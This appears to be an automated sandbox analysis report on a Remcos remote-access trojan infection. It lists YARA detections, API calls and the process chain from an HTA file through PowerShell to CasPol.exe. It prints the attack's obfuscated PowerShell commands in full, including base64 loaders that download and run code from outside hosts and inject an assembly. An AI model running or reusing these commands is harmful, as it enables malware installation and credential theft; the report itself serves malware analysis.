                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 8092, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@69/150@25/9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,18_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,24_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,18_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\createthebestthingswithgoodthingsbestforgreatthingsformeevengood[1].tiffJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EC111K
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1xpek3d.jrk.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformation
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: CasPol.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: CasPol.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: CasPol.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: CasPol.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: CasPol.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: CasPol.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaReversingLabs: Detection: 21%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1972,i,17397243976134850236,17257031585275351317,262144 /prefetch:3
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6784 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6888 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF